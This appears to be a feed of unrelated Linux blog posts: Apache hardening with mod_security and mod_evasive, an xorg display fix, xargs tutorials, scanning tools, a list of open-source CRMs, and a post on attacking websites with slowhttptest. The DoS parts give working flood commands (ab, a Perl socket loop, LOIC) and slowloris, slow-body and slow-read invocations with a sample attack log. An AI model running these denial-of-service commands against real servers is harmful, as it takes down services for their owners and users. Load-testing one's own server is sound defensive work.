    Include crs/owasp-modsecurity-crs/base_rules/*.conf
</IfModule>
Last, but not least, we will create our own configuration file within the modsecurity.d directory where we will include our chosen directives. We will name this configuration file xmodulo.conf in this example. It is highly encouraged that you do not edit the CRS files directly but rather place all necessary directives in this configuration file. This will allow for easier upgrading as newer CRSs are released.
# vi /etc/httpd/modsecurity.d/xmodulo.conf
<IfModule security2_module>
    SecRuleEngine On
    SecRequestBodyAccess On
    SecResponseBodyAccess On
    SecResponseBodyMimeType text/plain text/html text/xml application/octet-stream
    SecDataDir /tmp
</IfModule>
  • SecRuleEngine On: Use the OWASP CRS to detect and block malicious attacks.
  • SecRequestBodyAccess On: Enable inspection of data transported in request bodies (e.g., POST parameters).
  • SecResponseBodyAccess On: Buffer response bodies (only if the response MIME type matches the list configured with SecResponseBodyMimeType).
  • SecResponseBodyMimeType text/plain text/html text/xml application/octet-stream: Configures which MIME types are to be considered for response body buffering. If you are unfamiliar with MIME types or unsure about their names or usage, you can check the Internet Assigned Numbers Authority (IANA) web site.
  • SecDataDir /tmp: Path where persistent data (e.g., IP address data, session data, and so on) is to be stored. Here persistent means anything that is not stored in memory, but on hard disk.
You can refer to the SpiderLabs' ModSecurity GitHub repository for a complete guide of configuration directives.
Don't forget to restart Apache to apply changes.
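To double-check that both modules are actually loaded after the restart, something along these lines should work (httpd -M lists the modules Apache has loaded):
# httpd -M | grep -E 'security2|evasive20'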

Configuring mod_evasive

The mod_evasive module reads its configuration from /etc/httpd/conf.d/mod_evasive.conf. As opposed to mod_security, we don't need a separate configuration file because there are no rules to update during a system or package upgrade.
The default mod_evasive.conf file has the following directives enabled:
<IfModule mod_evasive20.c>
    DOSHashTableSize    3097
    DOSPageCount        2
    DOSSiteCount        50
    DOSPageInterval     1
    DOSSiteInterval     1
    DOSBlockingPeriod   10
</IfModule>
  • DOSHashTableSize: The size of the hash table that is used to keep track of activity on a per-IP address basis. Increasing this number will provide a faster look up of the sites that the client has visited in the past, but may impact overall performance if it is set too high.
  • DOSPageCount: The number of identical requests to a specific URI (for example, a file that is being served by Apache) a visitor can make over the DOSPageInterval interval.
  • DOSSiteCount: similar to DOSPageCount, but refers to how many overall requests can be made to the site over the DOSSiteInterval interval.
  • DOSBlockingPeriod: If a visitor exceeds the limits set by DOSPageCount or DOSSiteCount, he/she will be blacklisted for the DOSBlockingPeriod amount of time (in seconds). During this interval, any requests coming from him/her will return a 403 Forbidden error.
You may want to change these values according to the amount and type of traffic that your web server needs to handle. Please note that if these values are not set properly, you may end up blocking legitimate visitors.
Here are other useful directives for mod_evasive:
1) DOSEmailNotify: Sends an email to the specified address whenever an IP address becomes blacklisted. It needs a valid email address as an argument. If SELinux is set to enforcing, you will need to grant the apache user SELinux permission to send emails. That is, run this command as root:
# setsebool -P httpd_can_sendmail 1
Then add this directive in the mod_evasive.conf file:
DOSEmailNotify you@yourdomain.com
2) DOSSystemCommand: Executes a custom system command whenever an IP address becomes blacklisted. It may come in handy to add firewall rules to block offending IPs altogether.
DOSSystemCommand <command>
We will use this directive to add a firewall rule through the following script (/etc/httpd/scripts/ban_ip.sh):
#!/bin/sh
# Offending IP as detected by mod_evasive
IP=$1
# Path to iptables binary executed by user apache through sudo
IPTABLES="/sbin/iptables"
# mod_evasive lock directory
MOD_EVASIVE_LOGDIR=/tmp
# Add the following firewall rule (block IP)
$IPTABLES -I INPUT -s $IP -j DROP
# Unblock offending IP after 2 hours through the 'at' command; see 'man at' for further details
echo "$IPTABLES -D INPUT -s $IP -j DROP" | at now + 2 hours
# Remove lock file for future checks
rm -f "$MOD_EVASIVE_LOGDIR"/dos-"$IP"
Our DOSSystemCommand directive will then read as follows:
DOSSystemCommand "sudo /etc/httpd/scripts/ban_ip.sh %s"
Don't forget to update sudo permissions to run our script as apache user:
# vi /etc/sudoers
apache ALL=NOPASSWD: /etc/httpd/scripts/ban_ip.sh
Defaults:apache !requiretty
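Note that the script must also be executable for the directive above to work; if you created it from scratch as shown, something like this should do:
# chmod +x /etc/httpd/scripts/ban_ip.sh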

Simulating DoS Attacks

We will use three tools to stress test our Apache web server (running on CentOS 6.5 with 512 MB of RAM and an AMD Athlon II X2 250 processor), with and without mod_security and mod_evasive enabled, and check how the web server behaves in each case.
Make sure you ONLY perform the following steps in your own test server and NOT against an external, production web site.
In the following examples, replace http://centos.gabrielcanepa.com.ar/index.php with your own domain and a file of your choosing.

Linux-based tools

1. Apache bench: Apache server benchmarking tool.
# ab -n1000 -c1000 http://centos.gabrielcanepa.com.ar/index.php
  • -n: Number of requests to perform for the benchmarking session.
  • -c: Number of multiple requests to perform at a time.
2. test.pl: a Perl script which comes with mod_evasive module.
#!/usr/bin/perl
 
# test.pl: small script to test mod_dosevasive's effectiveness
 
use IO::Socket;
use strict;
 
for (0..100) {
  my($response);
  my($SOCKET) = new IO::Socket::INET( Proto    => "tcp",
                                      PeerAddr => "192.168.0.16:80");
  if (! defined $SOCKET) { die $!; }
  print $SOCKET "GET /?$_ HTTP/1.0\n\n";
  $response = <$SOCKET>;
  print $response;
  close($SOCKET);
}

Windows-based tools

1. Low Orbit Ion Cannon (LOIC): a network stress testing tool. To generate a workload, follow the order shown in the screenshot below, and DO NOT touch anything else.

Stress Test Results

With mod_security and mod_evasive enabled (and the three tools running at the same time), CPU and RAM usage peak at a maximum of 60% and 50%, respectively, for only 2 seconds before the source IPs are blacklisted and blocked by the firewall, and the attack is stopped.
On the other hand, if mod_security and mod_evasive are disabled, the three tools mentioned above knock down the server very fast (and keep it in that state throughout the duration of the attack), and of course, the offending IPs are not blacklisted.

Conclusion

We can see that mod_security and mod_evasive, when properly configured, are two important tools for hardening an Apache web server against several threats (not limited to DoS attacks) and should be considered in deployments exposed to the Internet.

Find HorizSync VertRefresh rates to fix Linux display issue – Why my display is stuck at 640×480?

$
0
0
http://www.blackmoreops.com/2014/08/29/fix-linux-display-issue-find-horizsync-vertrefresh-rates

I had this problem a few days back, and it took me some time to figure out what to do.
I have an NVIDIA GTX460 graphics card on my current machine and an Acer 22" monitor. After installing the NVIDIA driver, my display was stuck at 640x480 and no matter what I did, nothing fixed it. This is an unusual problem with the NVIDIA driver. I am assuming the Intel and ATI drivers might have similar issues.

Fix Linux display issue

So if you are having a problem with your display, or if your display is stuck at 640x480, then try the following:
Edit the /etc/X11/xorg.conf file
root@kali:~# vi /etc/X11/xorg.conf

You will see something like this
Section "Monitor"
    # HorizSync source: edid, VertRefresh source: edid
    Identifier     "Monitor0"
    VendorName     "Unknown"
    ModelName      "Acer X223W"
    HorizSync       28.0 - 33.0
    VertRefresh     43.0 - 72.0
    Option         "DPMS"
EndSection

Now, the two lines that control the display on the monitor are the following:
    HorizSync       28.0 - 33.0
    VertRefresh     43.0 - 72.0
Depending on your monitor, you have to find the correct HorizSync and VertRefresh ranges.

Find supported HorizSync VertRefresh rates in Linux

It took me quite some time to determine exactly what I was looking for. I obviously tried the xrandr command first, like anyone would.
root@kali:~# xrandr --query

This gave me an output like the following
root@kali:~# xrandr --query
Screen 0: minimum 8 x 8, current 1680 x 1050, maximum 16384 x 16384
DVI-I-0 disconnected (normal left inverted right x axis y axis)
DVI-I-1 disconnected (normal left inverted right x axis y axis)
DVI-I-2 connected 1680x1050+0+0 (normal left inverted right x axis y axis) 474mm x 296mm
   1680x1050      60.0*+
   1600x1200      60.0  
   1440x900       75.0     59.9  
   1400x1050      60.0  
   1360x765       60.0  
   1280x1024      75.0  
   1280x960       60.0  
   1152x864       75.0  
   1024x768       75.0     70.1     60.0  
   800x600        75.0     72.2     60.3     56.2  
   640x480        75.0     72.8     59.9  
HDMI-0 disconnected (normal left inverted right x axis y axis)
DVI-I-3 disconnected (normal left inverted right x axis y axis)


Fix display issue in Linux - after installing NVIDIA driver, display stuck - blackMORE Ops -1
Bugger all, this doesn't help me find the supported HorizSync and VertRefresh rates. I went around looking for options and found a tool that does exactly what's needed.

Find monitor HorizSync VertRefresh rates with ddcprobe

First we need to install xresprobe which contains ddcprobe.
root@kali:~# apt-get install xresprobe
Fix display issue in Linux - after installing graphics driver, display stuck - Detect supported VertRefresh and HorizSync values - blackMORE Ops -2

Once xresprobe is installed, we can run the following command to find all supported monitor HorizSync and VertRefresh rates, including the supported display resolutions ... well, the whole lot, some of which even I wasn't aware of.
root@kali:~# ddcprobe 
vbe: VESA 3.0 detected.
oem: NVIDIA
vendor: NVIDIA Corporation
product: GF104 Board - 10410001 Chip Rev
memory: 14336kb
mode: 640x400x256
mode: 640x480x256
mode: 800x600x16
mode: 800x600x256
mode: 1024x768x16
mode: 1024x768x256
mode: 1280x1024x16
mode: 1280x1024x256
mode: 320x200x64k
mode: 320x200x16m
mode: 640x480x64k
mode: 640x480x16m
mode: 800x600x64k
mode: 800x600x16m
mode: 1024x768x64k
mode: 1024x768x16m
mode: 1280x1024x64k
mode: 1280x1024x16m
edid:
edid: 1 3
id: 000d
eisa: ACR000d
serial: 7430d0b5
manufacture: 43 2007
input: analog signal.
screensize: 47 30
gamma: 2.200000
dpms: RGB, active off, suspend, standby
timing: 720x400@70 Hz (VGA 640x400, IBM)
timing: 720x400@88 Hz (XGA2)
timing: 640x480@60 Hz (VGA)
timing: 640x480@67 Hz (Mac II, Apple)
timing: 640x480@72 Hz (VESA)
timing: 640x480@75 Hz (VESA)
timing: 800x600@60 Hz (VESA)
timing: 800x600@72 Hz (VESA)
timing: 800x600@75 Hz (VESA)
timing: 832x624@75 Hz (Mac II)
timing: 1024x768@87 Hz Interlaced (8514A)
timing: 1024x768@70 Hz (VESA)
timing: 1024x768@75 Hz (VESA)
timing: 1280x1024@75 (VESA)
ctiming: 1600x1200@60
ctiming: 1152x864@75
ctiming: 1280x960@60
ctiming: 1360x850@60
ctiming: 1440x1440@60
ctiming: 1440x1440@75
ctiming: 1400x1050@60
dtiming: 1680x1050@77
monitorrange: 31-84, 56-77
monitorserial: LAV0C0484010
monitorname: X223W
root@kali:~#
Now the line I am interested in is this:
monitorrange: 31-84, 56-77
Those are the supported HorizSync (31-84 kHz) and VertRefresh (56-77 Hz) ranges for my monitor.
Fix display issue in Linux - after installing graphics driver, display stuck - Detect supported VertRefresh and HorizSync values with ddcprobe - blackMORE Ops -3
ddcprobe also gave me a few more useful pieces of info, like the monitor name and monitor serial.
monitorserial: LAV0C0484010
monitorname: X223W
Now time to put it all together.

Edit the xorg.conf file with the correct HorizSync and VertRefresh rates

So now we know the exact values we need. We can edit our /etc/X11/xorg.conf file with the values we want. I've edited my xorg.conf file to look like the following:
root@kali:~# vi /etc/X11/xorg.conf

Section "Monitor"
    # HorizSync source: edid, VertRefresh source: edid
    Identifier     "Monitor0"
    VendorName     "Unknown"
    ModelName      "Acer X223W"
    HorizSync       31.0 - 84.0
    VertRefresh     56.0 - 77.0

    Option         "DPMS"
EndSection
Save and exit the xorg.conf file, restart, and I am now enjoying a 1680x1050 display on my monitor. Here's the xorg.conf file I have right now:
# nvidia-xconfig: X configuration file generated by nvidia-xconfig
# nvidia-xconfig:  version 304.48  (pbuilder@cake)  Wed Sep 12 10:54:51 UTC 2012

# nvidia-settings: X configuration file generated by nvidia-settings
# nvidia-settings:  version 304.88  (pbuilder@cake)  Wed Apr  3 08:58:25 UTC 2013

Section "ServerLayout"
    Identifier     "Layout0"
    Screen      0  "Screen0" 0 0
    InputDevice    "Keyboard0" "CoreKeyboard"
    InputDevice    "Mouse0" "CorePointer"
    Option         "Xinerama" "0"
EndSection

Section "Files"
EndSection

Section "InputDevice"

    # generated from default
    Identifier     "Mouse0"
    Driver         "mouse"
    Option         "Protocol" "auto"
    Option         "Device" "/dev/psaux"
    Option         "Emulate3Buttons" "no"
    Option         "ZAxisMapping" "4 5"
EndSection

Section "InputDevice"

    # generated from default
    Identifier     "Keyboard0"
    Driver         "kbd"
EndSection

Section "Monitor"

    # HorizSync source: edid, VertRefresh source: edid
    Identifier     "Monitor0"
    VendorName     "Unknown"
    ModelName      "Acer X223W"
    HorizSync       31.0 - 84.0
    VertRefresh     56.0 - 77.0
    Option         "DPMS"
EndSection

Section "Device"
    Identifier     "Device0"
    Driver         "nvidia"
    VendorName     "NVIDIA Corporation"
    BoardName      "GeForce GTX 460"
EndSection

Section "Screen"
    Identifier     "Screen0"
    Device         "Device0"
    Monitor        "Monitor0"
    DefaultDepth    24
    Option         "Stereo" "0"
    Option         "metamodes" "nvidia-auto-select +0+0"
    SubSection     "Display"
        Depth       24
    EndSubSection
EndSection
This fixed my problem quite well. It might be useful to someone else out there.

Reference Websites and posts

The biggest help is always the X.org website for any display-related issues.
http://www.x.org/wiki/FAQVideoModes
I also later realized that Eddy posted about a similar problem in one of my posts, where he fixed it in exactly the same way.
Doh! I should've just searched my own posts and readers' comments. Eddy's post doesn't outline how to find the HorizSync and VertRefresh rates, though. Either way, Eddy's post was the most accurate I found related to my problem.

Perform Multiple Operations in Linux with the ‘xargs’ Command

$
0
0
http://www.maketecheasier.com/mastering-xargs-command-linux

Xargs is a useful command that acts as a bridge between two commands, reading output of one and executing the other with the items read. The command is most commonly used in scenarios when a user is searching for a pattern, removing and renaming files, and more.
In its basic form, xargs reads information from the standard input (or STDIN) and executes a command one or more times with the items read.
As an illustration, the following xargs command expects the user to enter a file or a directory name:
xargs ls -l
Once a name is entered, the xargs command passes that information to the ls command.
Here is the output of the above shown xargs command when I executed it from my home directory by entering “Documents” (which is a sub-directory in my Home folder) as an input:
xargs-basic-example
Observe that in this case, the xargs command executed the ls command with the directory name as a command line argument to produce a list of files present in that directory.
While the xargs command can be used in various command line operations, it comes in really handy when used with the find command. In this article, we will discuss some useful examples to understand how xargs and find can be used together.
Suppose you want to copy the contents of “ref.txt” to all .txt files present in a directory. While the task may otherwise require you to execute multiple commands, the xargs command, along with the find command, makes it simple.
Just run the following command:
find ./ -name "*.txt" | xargs -n1 cp ../ref.txt
To understand the command shown above, let’s divide it into two parts.
The first part is find ./ -name "*.txt" , which searches for all the .txt files present in the current directory.
The second part xargs -n1 cp ../ref.txt will grab the output of the first command (the resulting file names) and hand it over to the cp (copy) command one by one. Note that the -n option is crucial here, as it instructs xargs to use one argument per execution.
When combined together, the full command will copy the content of “ref.txt” to all .txt files in the directory.
One of the major advantages of using xargs is its ability to handle a large number of arguments. For example, while deleting a large number of files in one go, the rm command would sometimes fail with an "Argument list too long" error. That's because it simply couldn't handle such a long list of arguments. This is usually the case when you have too many files in the folder that you want to delete.
rm-arg-list-too-long
This can be easily fixed with xargs. To delete all these files, use the following command:
find ./rm-test/ -name "*" -print | xargs rm
Software developers as well as system administrators do a lot of pattern searching while working on the command line. For example, a developer might want to take a quick look at the project files that modify a particular variable, or a system administrator might want to see the files that use a particular system configuration parameter. In these scenarios, xargs, along with find and grep, makes things easy for you.
For example, to search for all .txt files that contain the “maketecheasier” string, run the following command:
$ find ./ -name "*.txt" | xargs grep "maketecheasier"
Here is the output the command produced on my system:
find-xargs-grep
Xargs, along with the find command, can also be used to copy or move a set of files from one directory to another. For example, to move all the text files that are more than 10 minutes old from the current directory to the previous directory, use the following command:
find . -name "*.txt" -mmin +10 | xargs -n1 -I '{}' mv '{}' ../
The -I command line option is used by the xargs command to define a replace-string which gets replaced with names read from the output of the find command. Here the replace-string is {}, but it could be anything. For example, you can use “file” as a replace-string.
find . -name "*.txt" -mmin +10 | xargs -n1 -I 'file' mv 'file' ./practice
Suppose you want to list the details of all the .txt files present in the current directory. As already explained, it can be easily done using the following command:
find . -name "*.txt" | xargs ls -l
But there is one problem; the xargs command will execute the ls command even if the find command fails to find any .txt file. Here is an example:
find-xargs
So you can see that there are no .txt files in the directory, but that didn’t stop xargs from executing the ls command. To change this behaviour, use the -r command line option:
find . -name "*.txt" | xargs -r ls -l
Although I've concentrated here on using xargs with find, it can also be used with many other commands. Go through the command's man page to learn more about it, and leave a comment below if you have a doubt or query.

3 tools that make scanning on the Linux desktop quick and easy

$
0
0
https://opensource.com/life/14/8/3-tools-scanners-linux-desktop

Whether you're moving to a paperless lifestyle, need to scan a document to back it up or email it, want to scan an old photo, or whatever reason you have for making the physical electronic, a scanner comes in handy. In fact, a scanner is essential.
But the catch is that most scanner makers don't have Linux versions of the software that they bundle with their devices. For the most part, that doesn't matter. Why? Because there are good scanning applications available for the Linux desktop. They work with a variety of scanners, and do a good job.
Let's take a look at a three simple but flexible Linux scanning tools. Keep in mind that the software discussed below is hardly an exhaustive list of the scanner software that's available for the Linux desktop. It's what I've used extensively and found useful.
First up, Simple Scan. It's the default scanner application for Ubuntu and its derivatives like Linux Mint. Simple Scan is easy to use and packs a few useful features. After you've scanned a document or photo, you can rotate or crop it and save it as an image (JPEG or PNG only) or a PDF. That said, Simple Scan can be slow, even if you scan documents at lower resolutions. On top of that, Simple Scan uses a set of global defaults for scanning, like 150 dpi for text and 300 dpi for photos. You need to go into Simple Scan's preferences to change those settings.
Next up, gscan2pdf. It packs a few more features than Simple Scan but it's still comparatively light. In addition to being able to save scans in various image formats (JPEG, PNG, and TIFF), you can also save a scan as a PDF or a DjVu file. Unlike Simple Scan, gscan2pdf allows you to set the resolution of what you're scanning, whether it's black and white or colour, and paper size of your scan before you click the button. Those aren't killer features, but they give you a bit more flexibility.
Finally, The GIMP. You probably know it as an image editing tool. When combined with a plugin called QuiteInsane, The GIMP becomes a powerful scanning application. When you scan with The GIMP, you not only get the opportunity to set a number of options (for example, whether it's color or black and white, the resolution of the scan, and whether or not to compress results), you can also use The GIMP's tools to touch up or apply effects to your scans. This makes it perfect for scanning photos and art.

Do they really just work?

The software discussed above works well for the most part and with a variety of hardware. I've used Simple Scan, gscan2pdf, and The GIMP with QuiteInsane with three multifunction printers that I've owned over the years—whether using a USB cable or over wireless. They've even worked with a Fujitsu ScanSnap scanner. While Simple Scan, gscan2pdf, and The GIMP didn't have all the features of the ScanSnap Manager software (which is for Windows or Mac only), the ScanSnap did scan documents very quickly.
You might have noticed that I wrote works well for the most part in the previous paragraph. I did run into one exception: an inexpensive Canon multifunction printer. Neither Simple Scan, gscan2pdf, nor The GIMP could detect it. I had to download and install Canon's Linux scanner software, which did work.
Scanning on the Linux desktop can be easy. And there's a lot of great software with which to do it.
What's your favourite scanning tool for Linux? Share your pick by leaving a comment.

12 Open Source CRM Options

$
0
0
http://www.enterpriseappstoday.com/crm/12-open-source-crm-options.html


CRM isn't just limited to products from giants like Microsoft and Salesforce.com. There are a surprising number of open source options as well.

Talk about customer relationship management (CRM) software and you'll probably be thinking about on-premise software packages or software-as-a-service (SaaS) offerings from big companies like Salesforce.com, SAP, Oracle or Microsoft.
But as well as these and other commercial CRM offerings, there are also plenty of viable open source CRM solutions. Like other variants of open source software, many of them offer a free "community" edition as well as commercial open source editions which come with additional features and support.
Specialist third party consultants also offer paid support and help with implementation. They can also customize the open source code to match your organization's requirements.
Given that most CRM systems (proprietary or open source) include many of the same key features, the value of open source CRM systems comes from the fact that they can easily be customized, precisely because the source code is freely available, according to Greg Soper, managing director of SalesAgility, a consultancy that specializes in providing services for the popular SugarCRM open source product.

Rather than trying to choose a commercial CRM product that offers most of the features you need, it makes more sense to pay a consultancy such as his to add the precise features you need to an open source product, Soper contends.
"Why not get the open source software that you plan to use for free, and then use the money that you would otherwise have spent on proprietary license fees to modify the open source software to meet your needs more closely?" he asks. "Why pay for software that is the same for all users when you can pay to have something that is unique?"
If you are interested in investigating open source CRM software, here are 12 solutions worth a closer look.
SugarCRM is the most well-known and arguably the most comprehensive open source CRM package, with all the standard features that you would expect from a commercial package.
The free Community Edition is available to download for Linux, UNIX and OS X. Subscription versions include support, mobile functionality, sales automation and forecasting, marketing lead management and other extra features. They range from $35 per user per month (with a minimum $4,200-per-year subscription) for the Pro version, to $150 per user per month for the Ultimate version, which includes enterprise opportunity management, enterprise forecasting, a customer self-service portal and custom activity streams, 24/7 support and an assigned technical account manager.
Vtiger is based on SugarCRM code and offers most - but not all - of SugarCRM's features. It has a few extra features of its own, such as inventory management and project management. It can be extended with official and third party add-ons such as a Microsoft Exchange connector and a Microsoft Outlook connector.
As well as the freely downloadable version, Vtiger offers its CRM as a SaaS product called Vtiger CRM on Demand for $12 per user per month including 5 gigabytes of storage and support. Mobile apps for iOS and Android are available for a $20 one-time fee per device.
SuiteCRM is another fork of SugarCRM. Its aim is to offer functionality similar to SugarCRM's commercial versions in a free community edition. (What prompted the fork was that SugarCRM announced in 2013 that it would no longer be releasing new code to its Community Edition, according to SuiteCRM.)
SuiteCRM is available to download and run free. Three hosted versions are also available for $16 per user per month: SuiteCRM Sales, SuiteCRM Service and SuiteCRM Max, which includes every feature of SuiteCRM. Basic forum-based support is free, while enhanced telephone, email and portal support is available for $8 per user per month.
Fat Free CRM is a Ruby on Rails-based open source CRM product which is lightweight, customizable and aimed at smaller businesses. Out of the box it comes with group collaboration, campaign and lead management, contact lists and opportunity tracking, but it can be extended with a number of plug-ins, or you can develop your own.
As the name suggests, Fat Free CRM eschews complex features and is designed to be simple to use with an intuitive user interface. It can be downloaded and run free, with source code available on Github. No commercial versions are offered.
Odoo is the new name for an open source business suite previously known as OpenERP. Odoo offers open source CRM software as well as other business apps including billing, accounting, warehouse management and project management.
The Community edition of Odoo CRM is available to download for free. The hosted version is available free for two users, and thereafter Euros 12 ($15 U.S) per user per month, including email support. A more comprehensive package that includes customization assistance and training materials is also available for Euros 111 ($140 U.S.) per user per month.
Zurmo includes standard CRM features like contact and activity management, deal tracking, marketing automation and reporting. What makes it different is that it also focuses on younger CRM users by offering gamification. This uses points, levels, badges, missions and leaderboards to encourage employees to use and explore Zurmo's features.
As well as a free downloadable version, Zurmo offers a hosted version that includes email and phone support, and integration with Outlook, Google Apps and Exchange, for $32 per user per month.
EspoCRM is a free Web-based CRM application that can be accessed from computers and mobile devices through a browser. Current features include sales automation, calendaring and customer support case management, with new features added every two months. Source code can be downloaded from SourceForge, and support is available from a Web forum.
SplendidCRM is aimed at Windows shops. It is offered in a free Community version that includes core CRM features like accounts, contacts, leads and opportunities, a more complete commercial Pro version ($300 per user per year) that includes product and order management surveys, and an Enterprise version ($480 per user per year) with workflow, ad-hoc reporting and an offline client.
SplendidCRM also offers a hosted version for $10 per user per month for the Community version, $25 for the Pro and $40 for the Enterprise.
Other open source CRM solutions include:
OpenCRX
X2Engine
Concourse Suite
CentraView

Attack a website using slowhttptest from Linux and Mac

$
0
0
http://www.darkmoreops.com/2014/09/23/attacking-website-using-slowhttptest

SlowHTTPTest is a highly configurable tool that simulates several application layer denial of service attacks. It works on the majority of Linux platforms, OS X and Cygwin, a Unix-like environment and command-line interface for Microsoft Windows.
It implements the most common low-bandwidth application layer DoS attacks, such as slowloris, Slow HTTP POST and the Slow Read attack (based on the TCP persist timer exploit), which work by draining the concurrent connection pool, as well as the Apache Range Header attack, which causes very significant memory and CPU usage on the server.
Slowloris and Slow HTTP POST DoS attacks rely on the fact that the HTTP protocol, by design, requires requests to be completely received by the server before they are processed. If an HTTP request is not complete, or if the transfer rate is very low, the server keeps its resources busy waiting for the rest of the data. If the server keeps too many resources busy, this creates a denial of service. This tool is sending partial HTTP requests, trying to get denial of service from target HTTP server.
Slow Read DoS attack aims the same resources as slowloris and slow POST, but instead of prolonging the request, it sends legitimate HTTP request and reads the response slowly.

slowhttptest logo - blackMORE Ops -3



Installation


Installation for Kali Linux users

For Kali Linux users, install via apt-get .. (life is good!)
root@kali:~# apt-get install slowhttptest
Reading package lists... Done
Building dependency tree       
Reading state information... Done
The following NEW packages will be installed:
  slowhttptest
0 upgraded, 1 newly installed, 0 to remove and 25 not upgraded.
Need to get 29.6 kB of archives.
After this operation, 98.3 kB of additional disk space will be used.
Get:1 http://http.kali.org/kali/ kali/main slowhttptest amd64 1.6-1kali1 [29.6 kB]
Fetched 29.6 kB in 1s (21.8 kB/s)     
Selecting previously unselected package slowhttptest.
(Reading database ... 376593 files and directories currently installed.)
Unpacking slowhttptest (from .../slowhttptest_1.6-1kali1_amd64.deb) ...
Processing triggers for man-db ...
Setting up slowhttptest (1.6-1kali1) ...
root@kali:~#

Install slow httptest - blackMORE Ops -1

For other Linux distributions

The tool is distributed as a portable package, so just download the latest tarball from the Downloads section, then extract, configure, compile, and install it:
$ tar -xzvf slowhttptest-x.x.tar.gz

$ cd slowhttptest-x.x

$ ./configure --prefix=PREFIX

$ make

$ sudo make install

Here, PREFIX must be replaced with the absolute path where the slowhttptest tool should be installed.
You need libssl-dev to be installed to successfully compile the tool. Most systems would have it.
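On Debian-based systems, for example, installing that build dependency might look like this (the package name can differ elsewhere, e.g. openssl-devel on RHEL/CentOS):
$ sudo apt-get install libssl-dev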
Alternatively, instead of compiling from source:

Mac OS X

Using Homebrew:
brew update && brew install slowhttptest

Linux

Try your favorite package manager; some distributions (like Kali Linux) already package slowhttptest.

Usage

slowhttptest is a flexible tool that allows you to do many things. Following are a few usage examples.

Example of usage in slow message body mode

slowhttptest -c 1000 -B -i 110 -r 200 -s 8192 -t FAKEVERB -u https://myseceureserver/resources/loginform.html -x 10 -p 3
Same test with graph:
slowhttptest -c 1000 -B -g -o my_body_stats -i 110 -r 200 -s 8192 -t FAKEVERB -u https://myseceureserver/resources/loginform.html -x 10 -p 3

Example of usage in slowloris mode

slowhttptest -c 1000 -H -i 10 -r 200 -t GET -u https://myseceureserver/resources/index.html -x 24 -p 3
Same test with graph:
slowhttptest -c 1000 -H -g -o my_header_stats -i 10 -r 200 -t GET -u https://myseceureserver/resources/index.html -x 24 -p 3

Example of usage in slow read mode with probing through proxy

Here the x.x.x.x:8080 proxy is used to probe website availability from an IP address different from yours:
slowhttptest -c 1000 -X -r 1000 -w 10 -y 20 -n 5 -z 32 -u http://someserver/somebigresource -p 5 -l 350 -e x.x.x.x:8080

Output

Depending on the verbosity level, the output can be as simple as a heartbeat message generated every 5 seconds showing the status of connections (verbosity level 1), or a full traffic dump (verbosity level 4).
The -g option generates both a CSV file and an interactive HTML report based on Google Chart Tools.
Here is a sample screenshot of generated HTML page
HTML Report from SlowHTTPTest

which contains graphically represented connection states and server availability intervals, and gives a picture of how a particular server behaves under a specific load within a given time frame.
CSV file can be used as data source for your favorite chart building tool, like MS Excel, iWork Numbers, or Google Docs.
The last message you'll see is the exit status, which hints at the possible reasons for program termination:
  • “Hit test time limit”: the program reached the time limit specified with the -l argument
  • “No open connections left”: the peer closed all connections
  • “Cannot establish connection”: no connections were established during the first N seconds of the test, where N is either the value of the -i argument, or 10 if not specified. This would happen if there is no route to the host or the remote peer is down
  • “Connection refused”: the remote peer doesn't accept connections (from you only? Use a proxy to probe) on the specified port
  • “Cancelled by user”: you pressed Ctrl-C or sent SIGINT in some other way
  • “Unexpected error”: should never happen

Sample output for a real test

I've done this test on a sample server, and this is what I've seen from both the attacking and the victim end.

From attackers end

So, I am collecting stats and attacking www.localhost.com with 1000 connections.
root@kali:~# slowhttptest -c 1000 -B -g -o my_body_stats -i 110 -r 200 -s 8192 -t FAKEVERB -u http://www.localhost.com -x 10 -p 3
Test output from a real slowhttptest - blackMORE Ops -2

Tue Sep 23 11:22:57 2014:
    slowhttptest version 1.6
 - https://code.google.com/p/slowhttptest/ -
test type:                        SLOW BODY
number of connections:            1000
URL:                              http://www.localhost.com/
verb:                             FAKEVERB
Content-Length header value:      8192
follow up data max size:          22
interval between follow up data:  110 seconds
connections per seconds:          200
probe connection timeout:         3 seconds
test duration:                    240 seconds
using proxy:                      no proxy

Tue Sep 23 11:22:57 2014:
slow HTTP test status on 85th second:

initializing:        0
pending:             23
connected:           133
error:               0
closed:              844
service available:   YES
^CTue Sep 23 11:22:58 2014:
Test ended on 86th second
Exit status: Cancelled by user
CSV report saved to my_body_stats.csv
HTML report saved to my_body_stats.html

From the victim server's end:

rootuser@localhost [/home]# pgrep httpd | wc -l
151
The total number of httpd connections jumped to 151 within 85 seconds. (I’ve got a fast Internet connection!)
And of course I want to see what’s in my /var/log/messages:
rootuser@someserver [/var/log]# tail -100 messages | grep Firewall

Sep 23 11:43:39 someserver: IP 1.2.3.4 (XX/Anonymous/1-2-3-4) found to have 504 connections
As you can see, I managed to crank up 504 connections from a single IP in less than 85 seconds. This is more than enough to bring down a server (well, most small servers and VPSes for sure).
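As a hedged aside (the "How to protect against slow HTTP DoS attacks" link in the further reading section covers this properly), one common first line of defense is to cap concurrent connections per source IP at the firewall, for example with the iptables connlimit module; the threshold of 50 here is an arbitrary example value:
# iptables -A INPUT -p tcp --syn --dport 80 -m connlimit --connlimit-above 50 -j REJECT --reject-with tcp-reset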
To make it worse, you can do it from Windows, Linux and even a Mac. I am starting to wonder whether you can do it using a jailbroken iPhone 6 Plus over the air (4G+ is fast), or a Galaxy Note 4. I can do it using my old Galaxy Nexus (rooted) and, of course, the good old Raspberry Pi.

Further reading and references

  1. Slowhttptest in Google
  2. How I knocked down 30 servers using slowhttptest
  3. Slow Read DoS attack explained
  4. Test results of popular HTTP servers
  5. How to protect against slow HTTP DoS attacks
The logo is from http://openclipart.org/detail/168031/.

How to use xargs command in Linux

$
0
0
http://xmodulo.com/xargs-command-linux.html

Have you ever been in the situation where you are running the same command over and over again for multiple files? If so, you know how tedious and inefficient this can feel. The good news is that there is an easier way, made possible through the xargs command in Unix-based operating systems. With this command you can process multiple files efficiently, saving you time and energy. In this tutorial, you will learn how to execute a command or script for multiple files at once, avoiding the daunting task of processing numerous log files or data files individually.
There are two ingredients for the xargs command. First, you must specify the files of interest. Second, you must indicate which command or script will be executed for each of the files you specified.
This tutorial will cover three scenarios in which the xargs command can be used to process files located within several different directories:
  1. Count the number of lines in all files
  2. Print the first line of specific files
  3. Process each file using a custom script
Consider the following directory named xargstest (the directory tree can be displayed using the tree command with the combined -i and -f options, which print the results without indentation and with the full path prefix for each file):
$ tree -if xargstest/

The contents of each of the six files are as follows:

The xargstest directory, its subdirectories and files will be used in the following examples.

Scenario 1: Count the number of lines in all files

